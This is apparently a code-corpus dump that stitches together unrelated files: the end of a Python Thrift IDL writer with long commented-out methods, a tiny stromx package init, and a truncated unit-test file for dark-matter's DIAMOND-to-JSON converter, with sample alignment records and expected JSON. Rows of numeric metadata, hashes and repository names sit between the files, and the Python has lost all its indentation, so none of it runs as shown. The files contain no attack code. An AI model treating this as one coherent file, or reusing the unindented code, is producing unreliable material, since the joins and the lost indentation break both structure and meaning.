# raise RuntimeError("Unhandled Element type '{0}'".format(item.__class__.__name__))
#
# @DispatchOn(item=ArsNamedElement)
# def _reference(self, item, target): # pylint: disable-msg=E0102
# target.write(item.name)
#
# @DispatchOn(item=ArsAtomicType)
# def _reference(self, item, target): # pylint: disable-msg=E0102
# target.write(ThriftWriter.ATOMIC_NAMES[item])
#
# @DispatchOn(item=ArsList)
# def _reference(self, item, target): # pylint: disable-msg=E0102
# target.write('list<')
# self._reference(item.element_type, target)
# target.write('>')
#
# @DispatchOn(item=ArsMap)
# def _reference(self, item, target): # pylint: disable-msg=E0102
# target.write('map<')
# self._reference(item.key_type, target)
# target.write(',')
# self._reference(item.value_type, target)
# target.write('>')
#
# @DispatchOn(item=ArsSet)
# def _reference(self, item, target): # pylint: disable-msg=E0102
# target.write('set<')
# self._reference(item.element_type, target)
# target.write('>')
def _write(self, item, target):
if isinstance(item, ArsTypeAlias):
target.write('typedef ')
self._reference(item.target_type, target)
target.write(' ')
self._reference(item, target)
target.write('\n')
elif isinstance(item, ArsException):
target.write('exception ')
self._reference(item, target)
target.write(' {')
sep = '\n\t'
ind = 1
for field in item.fields:
target.write('{0}{1}:'.format(sep, ind))
if field.optional:
target.write('optional ')
self._reference(field.type, target)
target.write(' ')
self._reference(field, target)
sep = '\n\t'
ind += 1
target.write('\n}\n')
elif isinstance(item, ArsStructure):
target.write('struct ')
self._reference(item, target)
target.write(' {')
sep = '\n\t'
ind = 1
for field in item.fields:
target.write('{0}{1}:'.format(sep, ind))
if field.optional:
target.write('optional ')
self._reference(field.type, target)
target.write(' ')
self._reference(field, target)
sep = '\n\t'
ind += 1
target.write('\n}\n')
elif isinstance(item, ArsConstant):
if item.type == ArsInteger:
target.write('const ')
self._reference(item.type, target)
target.write(' ')
self._reference(item, target)
target.write(' ' + str(item.value))
else:
raise ValueError('Constant type is not supported: {0}'.format(item.type))
elif isinstance(item, ArsService):
target.write('service ')
self._reference(item, target)
if item.base:
target.write(' extends ')
self._reference(item.base, target)
target.write(' {')
sep = '\n\t'
for procedure in item.procedures:
target.write(sep)
self._reference(procedure.return_type, target)
target.write(' ')
self._reference(procedure, target)
target.write('(')
sep2 = ''
ind = 1
for parameter in procedure.parameters:
target.write('{0}{1}:'.format(sep2, ind))
if parameter.optional:
target.write('optional ')
self._reference(parameter.type, target)
target.write(' ')
self._reference(parameter, target)
sep2 = ', '
ind += 1
target.write(')')
if procedure.exception_types:
target.write(' throws (')
sep2 = ''
ind = 1
for exception_type in procedure.exception_types:
target.write('{0}{1}:'.format(sep2, ind))
self._reference(exception_type, target)
target.write(' error{0}'.format(ind))
sep2 = ', '
ind += 1
target.write(')')
sep = '\n\t'
target.write('\n}\n')
# @DispatchOn(item=ArsTypeAlias)
# def _write(self, item, target): # pylint: disable-msg=E0102
# target.write('typedef ')
# self._reference(item.target_type, target)
# target.write(' ')
# self._reference(item, target)
# target.write('\n')
#
# @DispatchOn(item=ArsStructure)
# def _write(self, item, target): # pylint: disable-msg=E0102
# target.write('struct ')
# self._reference(item, target)
# target.write(' {')
# sep = '\n\t'
# ind = 1
# for field in item.fields:
# target.write('{0}{1}:'.format(sep, ind))
# if field.optional:
# target.write('optional ')
# self._reference(field.type, target)
# target.write(' ')
# self._reference(field, target)
# sep = '\n\t'
# ind += 1
# target.write('\n}\n')
#
# @DispatchOn(item=ArsException)
# def _write(self, item, target): # pylint: disable-msg=E0102
# target.write('exception ')
# self._reference(item, target)
# target.write(' {')
# sep = '\n\t'
# ind = 1
# for field in item.fields:
# target.write('{0}{1}:'.format(sep, ind))
# if field.optional:
# target.write('optional ')
# self._reference(field.type, target)
# target.write(' ')
# self._reference(field, target)
# sep = '\n\t'
# ind += 1
# target.write('\n}\n')
#
# @DispatchOn(item=ArsConstant)
# def _write(self, item, target): # pylint: disable-msg=E0102
# if item.type == ArsInteger:
# target.write('const ')
# self._reference(item.type, target)
# target.write(' ')
# self._reference(item, target)
# target.write(' ' + str(item.value))
# else:
# raise ValueError('Constant type is not supported: {0}'.format(item.type))
#
# @DispatchOn(item=ArsService)
# def _write(self, item, target): # pylint: disable-msg=E0102
# target.write('service ')
# self._reference(item, target)
# if item.base:
# target.write(' extends ')
# self._reference(item.base, target)
# target.write(' {')
# sep = '\n\t'
# for procedure in item.procedures:
# target.write(sep)
# self._reference(procedure.return_type, target)
# target.write(' ')
# self._reference(procedure, target)
# target.write('(')
# sep2 = ''
# ind = 1
# for parameter in procedure.parameters:
# target.write('{0}{1}:'.format(sep2, ind))
# if parameter.optional:
# target.write('optional ')
# self._reference(parameter.type, target)
# target.write(' ')
# self._reference(parameter, target)
# sep2 = ', '
# ind += 1
# target.write(')')
# if procedure.exception_types:
# target.write(' throws (')
# sep2 = ''
# ind = 1
# for exception_type in procedure.exception_types:
# target.write('{0}{1}:'.format(sep2, ind))
# self._reference(exception_type, target)
# target.write(' error{0}'.format(ind))
# sep2 = ', '
# ind += 1
# target.write(')')
# sep = '\n\t'
# target.write('\n}\n')
#
def write_to(self, interface, target):
target.write('namespace java satori.thrift.gen\n')
for type in interface.types:
self._write(type, target)
for constant in interface.constants:
self._write(constant, target)
for service in interface.services:
self._write(service, target)
| 36.481752 | 94 | 0.508203 | 967 | 9,996 | 5.152017 | 0.125129 | 0.187676 | 0.11943 | 0.092734 | 0.833802 | 0.829787 | 0.796267 | 0.792654 | 0.792654 | 0.774589 | 0 | 0.017046 | 0.354442 | 9,996 | 273 | 95 | 36.615385 | 0.754998 | 0.459584 | 0 | 0.457364 | 0 | 0 | 0.063797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.007752 | 0 | 0.046512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
142c7005ae0738dfec0f7becf1e4fac2e085a686 | 45 | py | Python | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | python/stromx/test/__init__.py | roteroktober/stromx | e081a35114f68a77e99a4761946b8b8c64eb591a | [
"Apache-2.0"
] | null | null | null | import stromx.runtime
from libtest import *
| 11.25 | 21 | 0.8 | 6 | 45 | 6 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155556 | 45 | 3 | 22 | 15 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
14425478ce240adb8af1278d60e42571d6b62664 | 58,233 | py | Python | test/diamond/test_conversion.py | TaliVeith/dark-matter | 1548a6e6fbfceb7c8b13556bbf4f7ce7d1ac18a0 | [
"MIT"
] | 10 | 2016-03-09T09:43:14.000Z | 2021-04-03T21:46:12.000Z | test/diamond/test_conversion.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 332 | 2015-01-07T12:37:30.000Z | 2022-01-20T15:48:11.000Z | test/diamond/test_conversion.py | terrycojones/dark-matter | 67d16f870db6b4239e17e542bc6e3f072dc29c75 | [
"MIT"
] | 4 | 2016-03-08T14:56:39.000Z | 2021-01-27T08:11:27.000Z | from six.moves import builtins
from unittest import TestCase
from io import BytesIO
import bz2file
from bz2 import compress
from six import assertRaisesRegex, StringIO
try:
from unittest.mock import patch, mock_open
except ImportError:
from mock import patch
from json import dumps
from dark.diamond.conversion import (
JSONRecordsReader, DiamondTabularFormatReader, DiamondTabularFormat)
from dark.reads import Reads, AARead
# The 15 fields expected in the DIAMOND output we parse are:
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop, nident, positive
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4 0 1
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3 1 2
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5 2 3
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6 3 4
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6 4 5
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9 5 6
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10 6 7
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8 7 8
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8 8 9
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8 9 10
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5 10 11
"""
# The 13 fields expected in the DIAMOND output before we added identities
# and positives (in version 2.0.3) were:
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS_WITHOUT_NIDENT_AND_POSITIVE = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5
"""
# The 17 fields expected in the DIAMOND output with nident, pident (number
# and percent identical) and positive & ppos (number and percent positive).
#
# qtitle, stitle, bitscore, evalue, qframe, qseq, qstart, qend, sseq, sstart,
# send, slen, btop, nident, pident, positive, ppos
#
# See the --outfmt section of 'diamond help' for detail on these directives.
#
# Note that the fields below must be separated by TABs.
DIAMOND_RECORDS_WITH_PERCENTS = """\
ACC94 INSV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4 2 5.0 1 4.0
ACC94 CASV 28.1 0.008 1 KLL 7 37 ITRV 9 39 300 3 3 10.0 2 9.0
ACC94 Golden 28.1 0.009 1 IKSKL 7 35 EETSR 9 37 293 5 4 15.0 3 14.0
ACC94 Golden 23.5 0.21 1 TIMSVV 177 240 DDMV 179 235 293 6 5 20.0 4 19.0
ACC94 HCoV 25.0 0.084 1 LHVNYL 1 203 DEELKA 2 210 290 6 6 25.0 5 24.0
ACC94 HCoV 18.5 9.1 1 SEIICE 226 257 VETVAQ 20 45 290 9 7 30.0 6 29.0
ACC94 FERV 24.6 0.11 1 YSCFT 176 276 LGKRMFC 152 243 270 10 8 35.0 7 34.0
AKAV AKAV 634 0.0 1 GEPFSV 1 306 NIYGEP 1 306 306 8 9 40.0 8 39.0
AKAV WYOV 401 7e-143 1 PFSVYG 1 306 GEPMS 1 294 294 8 10 45.0 9 44.0
BHAV TAIV 28.1 0.008 1 PKELHG 14 118 SLKSKE 15 131 307 8 11 50.0 10 49.0
BHAV SBAY 28.1 0.009 1 CRPTF 4 293 EFVFIY 6 342 343 5 12 55.0 11 54.0
"""
DIAMOND_RECORD_WITH_SPACES_IN_TITLES = """\
ACC 94 IN SV 29.6 0.003 1 EFII 178 295 SSSEV 175 285 295 4
"""
DIAMOND_RECORDS_DUMPED = '\n'.join([
dumps({
"application": "DIAMOND",
"reference": ("Buchfink et al., Fast and Sensitive "
"Protein Alignment using DIAMOND, Nature Methods, "
"12, 59-60 (2015)"),
"task": "blastx",
"version": "v0.8.23"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 29.6,
"btop": "4",
"expect": 0.003,
"frame": 1,
"identicalCount": 0,
"percentIdentical": None,
"positiveCount": 1,
"percentPositive": None,
"query": "EFII",
"query_end": 295,
"query_start": 178,
"sbjct": "SSSEV",
"sbjct_end": 285,
"sbjct_start": 175
}
],
"length": 295,
"title": "INSV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "3",
"expect": 0.008,
"frame": 1,
"identicalCount": 1,
"percentIdentical": None,
"positiveCount": 2,
"percentPositive": None,
"query": "KLL",
"query_end": 37,
"query_start": 7,
"sbjct": "ITRV",
"sbjct_end": 39,
"sbjct_start": 9
}
],
"length": 300,
"title": "CASV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 2,
"percentIdentical": None,
"positiveCount": 3,
"percentPositive": None,
"query": "IKSKL",
"query_end": 35,
"query_start": 7,
"sbjct": "EETSR",
"sbjct_end": 37,
"sbjct_start": 9
},
{
"bits": 23.5,
"btop": "6",
"expect": 0.21,
"frame": 1,
"identicalCount": 3,
"percentIdentical": None,
"positiveCount": 4,
"percentPositive": None,
"query": "TIMSVV",
"query_end": 240,
"query_start": 177,
"sbjct": "DDMV",
"sbjct_end": 235,
"sbjct_start": 179
}
],
"length": 293,
"title": "Golden"
},
{
"hsps": [
{
"bits": 25.0,
"btop": "6",
"expect": 0.084,
"frame": 1,
"identicalCount": 4,
"percentIdentical": None,
"positiveCount": 5,
"percentPositive": None,
"query": "LHVNYL",
"query_end": 203,
"query_start": 1,
"sbjct": "DEELKA",
"sbjct_end": 210,
"sbjct_start": 2
},
{
"bits": 18.5,
"btop": "9",
"expect": 9.1,
"frame": 1,
"identicalCount": 5,
"percentIdentical": None,
"positiveCount": 6,
"percentPositive": None,
"query": "SEIICE",
"query_end": 257,
"query_start": 226,
"sbjct": "VETVAQ",
"sbjct_end": 45,
"sbjct_start": 20
}
],
"length": 290,
"title": "HCoV"
},
{
"hsps": [
{
"bits": 24.6,
"btop": "10",
"expect": 0.11,
"frame": 1,
"identicalCount": 6,
"percentIdentical": None,
"positiveCount": 7,
"percentPositive": None,
"query": "YSCFT",
"query_end": 276,
"query_start": 176,
"sbjct": "LGKRMFC",
"sbjct_end": 243,
"sbjct_start": 152
}
],
"length": 270,
"title": "FERV"
}
],
"query": "ACC94"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 634.0,
"btop": "8",
"expect": 0.0,
"frame": 1,
"identicalCount": 7,
"percentIdentical": None,
"positiveCount": 8,
"percentPositive": None,
"query": "GEPFSV",
"query_end": 306,
"query_start": 1,
"sbjct": "NIYGEP",
"sbjct_end": 306,
"sbjct_start": 1
}
],
"length": 306,
"title": "AKAV"
},
{
"hsps": [
{
"bits": 401.0,
"btop": "8",
"expect": 7e-143,
"frame": 1,
"identicalCount": 8,
"percentIdentical": None,
"positiveCount": 9,
"percentPositive": None,
"query": "PFSVYG",
"query_end": 306,
"query_start": 1,
"sbjct": "GEPMS",
"sbjct_end": 294,
"sbjct_start": 1
}
],
"length": 294,
"title": "WYOV"
}
],
"query": "AKAV"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 28.1,
"btop": "8",
"expect": 0.008,
"frame": 1,
"identicalCount": 9,
"percentIdentical": None,
"positiveCount": 10,
"percentPositive": None,
"query": "PKELHG",
"query_end": 118,
"query_start": 14,
"sbjct": "SLKSKE",
"sbjct_end": 131,
"sbjct_start": 15
}
],
"length": 307,
"title": "TAIV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 10,
"percentIdentical": None,
"positiveCount": 11,
"percentPositive": None,
"query": "CRPTF",
"query_end": 293,
"query_start": 4,
"sbjct": "EFVFIY",
"sbjct_end": 342,
"sbjct_start": 6
}
],
"length": 343,
"title": "SBAY"
}
],
"query": "BHAV"
}, sort_keys=True)
]) + '\n'
DIAMOND_RECORDS_WITH_PERCENTS_DUMPED = '\n'.join([
dumps({
"application": "DIAMOND",
"reference": ("Buchfink et al., Fast and Sensitive "
"Protein Alignment using DIAMOND, Nature Methods, "
"12, 59-60 (2015)"),
"task": "blastx",
"version": "v0.8.23"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 29.6,
"btop": "4",
"expect": 0.003,
"frame": 1,
"identicalCount": 2,
"percentIdentical": 5.0,
"percentPositive": 4.0,
"positiveCount": 1,
"query": "EFII",
"query_end": 295,
"query_start": 178,
"sbjct": "SSSEV",
"sbjct_end": 285,
"sbjct_start": 175
}
],
"length": 295,
"title": "INSV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "3",
"expect": 0.008,
"frame": 1,
"identicalCount": 3,
"percentIdentical": 10.0,
"percentPositive": 9.0,
"positiveCount": 2,
"query": "KLL",
"query_end": 37,
"query_start": 7,
"sbjct": "ITRV",
"sbjct_end": 39,
"sbjct_start": 9
}
],
"length": 300,
"title": "CASV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 4,
"percentIdentical": 15.0,
"percentPositive": 14.0,
"positiveCount": 3,
"query": "IKSKL",
"query_end": 35,
"query_start": 7,
"sbjct": "EETSR",
"sbjct_end": 37,
"sbjct_start": 9
},
{
"bits": 23.5,
"btop": "6",
"expect": 0.21,
"frame": 1,
"identicalCount": 5,
"percentIdentical": 20.0,
"percentPositive": 19.0,
"positiveCount": 4,
"query": "TIMSVV",
"query_end": 240,
"query_start": 177,
"sbjct": "DDMV",
"sbjct_end": 235,
"sbjct_start": 179
}
],
"length": 293,
"title": "Golden"
},
{
"hsps": [
{
"bits": 25.0,
"btop": "6",
"expect": 0.084,
"frame": 1,
"identicalCount": 6,
"percentIdentical": 25.0,
"percentPositive": 24.0,
"positiveCount": 5,
"query": "LHVNYL",
"query_end": 203,
"query_start": 1,
"sbjct": "DEELKA",
"sbjct_end": 210,
"sbjct_start": 2
},
{
"bits": 18.5,
"btop": "9",
"expect": 9.1,
"frame": 1,
"identicalCount": 7,
"percentIdentical": 30.0,
"percentPositive": 29.0,
"positiveCount": 6,
"query": "SEIICE",
"query_end": 257,
"query_start": 226,
"sbjct": "VETVAQ",
"sbjct_end": 45,
"sbjct_start": 20
}
],
"length": 290,
"title": "HCoV"
},
{
"hsps": [
{
"bits": 24.6,
"btop": "10",
"expect": 0.11,
"frame": 1,
"identicalCount": 8,
"percentIdentical": 35.0,
"percentPositive": 34.0,
"positiveCount": 7,
"query": "YSCFT",
"query_end": 276,
"query_start": 176,
"sbjct": "LGKRMFC",
"sbjct_end": 243,
"sbjct_start": 152
}
],
"length": 270,
"title": "FERV"
}
],
"query": "ACC94"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 634.0,
"btop": "8",
"expect": 0.0,
"frame": 1,
"identicalCount": 9,
"percentIdentical": 40.0,
"percentPositive": 39.0,
"positiveCount": 8,
"query": "GEPFSV",
"query_end": 306,
"query_start": 1,
"sbjct": "NIYGEP",
"sbjct_end": 306,
"sbjct_start": 1
}
],
"length": 306,
"title": "AKAV"
},
{
"hsps": [
{
"bits": 401.0,
"btop": "8",
"expect": 7e-143,
"frame": 1,
"identicalCount": 10,
"percentIdentical": 45.0,
"percentPositive": 44.0,
"positiveCount": 9,
"query": "PFSVYG",
"query_end": 306,
"query_start": 1,
"sbjct": "GEPMS",
"sbjct_end": 294,
"sbjct_start": 1
}
],
"length": 294,
"title": "WYOV"
}
],
"query": "AKAV"
}, sort_keys=True),
dumps({
"alignments": [
{
"hsps": [
{
"bits": 28.1,
"btop": "8",
"expect": 0.008,
"frame": 1,
"identicalCount": 11,
"percentIdentical": 50.0,
"percentPositive": 49.0,
"positiveCount": 10,
"query": "PKELHG",
"query_end": 118,
"query_start": 14,
"sbjct": "SLKSKE",
"sbjct_end": 131,
"sbjct_start": 15
}
],
"length": 307,
"title": "TAIV"
},
{
"hsps": [
{
"bits": 28.1,
"btop": "5",
"expect": 0.009,
"frame": 1,
"identicalCount": 12,
"percentIdentical": 55.0,
"percentPositive": 54.0,
"positiveCount": 11,
"query": "CRPTF",
"query_end": 293,
"query_start": 4,
"sbjct": "EFVFIY",
"sbjct_end": 342,
"sbjct_start": 6
}
],
"length": 343,
"title": "SBAY"
}
],
"query": "BHAV"
}, sort_keys=True)
]) + '\n'
class TestDiamondTabularFormatReader(TestCase):
"""
Test the DiamondTabularFormatReader class.
"""
def testDiamondParams(self):
"""
When a DIAMOND file has been read, its parameters must be present
in the reader instance.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
list(reader.records())
self.assertEqual('DIAMOND', reader.application)
self.assertEqual(
{
'application': 'DIAMOND',
'reference': (
'Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, '
'59-60 (2015)'),
'task': 'blastx',
'version': 'v0.8.23',
},
reader.params)
def testDiamondInput(self):
"""
Test conversion of a chunk of DIAMOND output.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94, akav, bhav = list(reader.records())
self.assertEqual(5, len(acc94['alignments']))
self.assertEqual(2, len(akav['alignments']))
self.assertEqual(2, len(bhav['alignments']))
def testDiamondInputWithoutNidentOrPositives(self):
"""
Test conversion of a chunk of DIAMOND output that does not contain the
nident, positives, or pident fields.
"""
mockOpener = mock_open(
read_data=DIAMOND_RECORDS_WITHOUT_NIDENT_AND_POSITIVE)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94, akav, bhav = list(reader.records())
for record in acc94, akav, bhav:
for alignment in record['alignments']:
for hsp in alignment['hsps']:
self.assertIs(None, hsp['identicalCount'])
self.assertIs(None, hsp['positiveCount'])
self.assertIs(None, hsp['percentIdentical'])
def testSaveAsJSON(self):
"""
A DiamondTabularFormatReader must be able to save itself as JSON.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
fp = StringIO()
reader.saveAsJSON(fp)
self.maxDiff = None
self.assertEqual(DIAMOND_RECORDS_DUMPED, fp.getvalue())
def testSaveAsJSONWithPercentIdentical(self):
"""
A DiamondTabularFormatReader must be able to save itself as JSON
when the percentIdentical field is present.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS_WITH_PERCENTS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
fp = StringIO()
reader.saveAsJSON(fp)
self.maxDiff = None
self.assertEqual(DIAMOND_RECORDS_WITH_PERCENTS_DUMPED,
fp.getvalue())
def testSaveAsJSONBzip2(self):
"""
A DiamondTabularFormatReader must be able to save itself as bzip2'd
JSON.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
data = BytesIO()
fp = bz2file.BZ2File(data, 'w')
reader.saveAsJSON(fp, writeBytes=True)
fp.close()
self.assertEqual(
compress(DIAMOND_RECORDS_DUMPED.encode('UTF-8')),
data.getvalue())
def testSaveAsJSONBzip2WithPercentIdentical(self):
"""
A DiamondTabularFormatReader must be able to save itself as bzip2'd
JSON when the percentIdentical field is present.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORDS_WITH_PERCENTS)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
data = BytesIO()
fp = bz2file.BZ2File(data, 'w')
reader.saveAsJSON(fp, writeBytes=True)
fp.close()
self.assertEqual(
compress(DIAMOND_RECORDS_WITH_PERCENTS_DUMPED.encode('UTF-8')),
data.getvalue())
def testSpacesMustBePreserved(self):
"""
If there are spaces in the query title or subject titles, the spaces
must be preserved.
"""
mockOpener = mock_open(read_data=DIAMOND_RECORD_WITH_SPACES_IN_TITLES)
with patch.object(builtins, 'open', mockOpener):
reader = DiamondTabularFormatReader('file.txt')
acc94 = list(reader.records())
self.assertEqual('ACC 94', acc94[0]['query'])
self.assertEqual('IN SV', acc94[0]['alignments'][0]['title'])
_JSON_RECORDS = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9631267|ref|NC_001989.1| Bovine RSV',
'length': 5046,
'hsps': [
{
'sbjct_start': 4039,
'sbjct_end': 4070,
'bits': 87.848,
'btop': '',
'frame': 1,
'query_start': 2,
'expect': 6.03169e-17,
'query_end': 98,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGTC'
'CTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCTA'
'TAATTATACCACT'),
}
]
}
],
'query': 'id2'
},
{
'alignments': [],
'query': 'id3'
},
{
'alignments': [],
'query': 'id4'
},
]
_JSON_RECORDS_ONE_MIDDLE = [
{
'application': 'DIAMOND',
'version': 'v0.8.23',
'reference': ('Buchfink et al., Fast and Sensitive Protein '
'Alignment using DIAMOND, Nature Methods, 12, 59-60 '
'(2015)'),
'task': 'blastx',
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 1817,
'sbjct_end': 1849,
'bits': 165.393,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 2.73597e-40,
'query_end': 99,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('AGGGCTCGGATGCTGTGGGTGTTTGTGTGGAGTTGGGTGTGT'
'TTTCGGGGGTGGTTGAGTGGAGGGATTGCTGTTGGATTGTGT'
'GTTTTGTTGTGGTTG'),
}
]
}
],
'query': 'id1'
},
{
'alignments': [
{
'title': 'gi|9629198|ref|NC_001781.1| Human RSV',
'length': 5075,
'hsps': [
{
'sbjct_start': 4074,
'sbjct_end': 4106,
'bits': 178.016,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 4.33545e-44,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
'query': ('TTTTTCTCCTGCGTAGATGAACCTACCCATGGCTTAGTAGGT'
'CCTCTTTCACCACGAGTTAAACCATTAACATTATATTTTTCT'
'ATAATTATACCACTGGC'),
}
]
},
{
'title': 'gi|9629367|ref|NC_001803.1| RSV',
'length': 5063,
'hsps': [
{
'sbjct_start': 4062,
'sbjct_end': 4094,
'bits': 123.915,
'btop': '',
'frame': 1,
'query_start': 1,
'expect': 8.37678e-28,
'query_end': 101,
'sbjct': ('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'),
